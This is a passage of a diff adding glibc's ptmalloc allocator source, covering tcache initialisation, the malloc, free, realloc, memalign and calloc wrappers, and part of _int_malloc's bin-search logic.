+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes;
+  checked_request2size (bytes, tbytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wrapps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (chunksize_nomask (victim)
+				   > av->system_mem, 0))
+            malloc_printerr ("malloc(): memory corruption");
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
